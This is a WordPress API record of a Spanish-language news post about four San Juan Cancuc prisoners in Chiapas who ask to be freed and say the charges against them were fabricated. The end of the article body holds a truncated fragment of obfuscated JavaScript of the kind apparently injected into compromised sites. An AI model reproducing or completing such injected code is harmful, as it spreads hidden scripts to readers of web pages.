{"id":15592,"date":"2024-05-15T02:13:14","date_gmt":"2024-05-15T02:13:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15592"},"modified":"2024-05-15T02:13:15","modified_gmt":"2024-05-15T02:13:15","slug":"presos-de-san-juan-cancuc-solicitan-libertad-tras-dos-anos-de-reclusion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15592","title":{"rendered":"Presos de San Juan Cancuc solicitan libertad tras dos a\u00f1os de reclusi\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240423-WA0203-1.jpg\" alt=\"\" class=\"wp-image-15593\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240423-WA0203-1.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240423-WA0203-1-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240423-WA0203-1-150x150.jpg 150w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>14 de mayo del 2024. San Crist\u00f3bal de Las Casas.- Cuatro recluidos en el Centro Estatal de Reinserci\u00f3n Social de Sentenciados (Cerss) n\u00famero 5, en esta ciudad, han emitido una ferviente solicitud de liberaci\u00f3n, argumentando que fueron acusados injustamente por la Fiscal\u00eda de Justicia Ind\u00edgena.<br>Agust\u00edn P\u00e9rez Dom\u00ednguez, Juan Velasco Aguilar, Mart\u00edn P\u00e9rez Dom\u00ednguez y Agust\u00edn P\u00e9rez Velasco, oriundos de San Juan Canc\u00fac, claman por su inmediata absoluci\u00f3n en una carta dirigida a varias organizaciones y entidades, entre ellas los zapatistas, la Di\u00f3cesis de San Crist\u00f3bal, el Pueblo Creyente y organismos de derechos humanos como el Centro de Derechos Humanos Fray Bartolom\u00e9 de las Casas, la Comisi\u00f3n Nacional de los Derechos Humanos (CNDH), la Comisi\u00f3n Estatal de Derechos Humanos (CEDH), Swefor y Sipaz.<\/p>\n\n\n\n<p>En el comunicado, los presos afirman: &#8220;Nosotros somos los presos de San Juan Cancuc, ya llevamos 2 a\u00f1os, se cumplen el d\u00eda 29 de mayo. Pagando un delito fabricado por la Fiscal\u00eda Ind\u00edgena. Nosotros estamos luchando por nuestra libertad inmediata para poder estar con nuestras familias. Les invitamos a los dem\u00e1s compas que se sigan sumando a la exigencia para poder lograr nuestra libertad&#8221;.<\/p>\n\n\n\n<p>El pasado 10 de mayo, los detenidos presentaron un recurso de amparo como parte de su b\u00fasqueda de justicia y liberaci\u00f3n inmediata. A pesar de reconocer la posible demora en la resoluci\u00f3n del amparo, los afectados insisten en continuar con su lucha por la justicia y la libertad. Agust\u00edn P\u00e9rez Dom\u00ednguez, uno de los recluidos, expres\u00f3: &#8220;Sabemos que faltan muchos meses para que haya una resoluci\u00f3n. Sin embargo, seguiremos luchando durante todos estos meses&#8221;.<\/p>\n\n\n\n<p>Este caso ha generado un llamado de atenci\u00f3n hacia las autoridades de los tres niveles de gobierno, inst\u00e1ndolas a garantizar un proceso legal justo y transparente. La petici\u00f3n de los presos de San Juan Cancuc ha suscitado un amplio respaldo de la sociedad civil y diversas organizaciones defensoras de los derechos humanos, quienes se han comprometido a seguir de cerca el desarrollo del caso y a brindar su apoyo en la b\u00fasqueda de una soluci\u00f3n justa y favorable para los afectados y sus familias.<br><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal14 de mayo del 2024. San Crist\u00f3bal de Las Casas.- Cuatro recluidos en el Centro Estatal de Reinserci\u00f3n Social de Sentenciados (Cerss) n\u00famero 5, en esta ciudad, han emitido una ferviente solicitud de liberaci\u00f3n, argumentando que fueron acusados injustamente por la Fiscal\u00eda de Justicia Ind\u00edgena.Agust\u00edn P\u00e9rez Dom\u00ednguez, Juan Velasco Aguilar, Mart\u00edn P\u00e9rez Dom\u00ednguez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15593,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15592","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15592"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15592\/revisions"}],"predecessor-version":[{"id":15594,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15592\/revisions\/15594"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15593"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}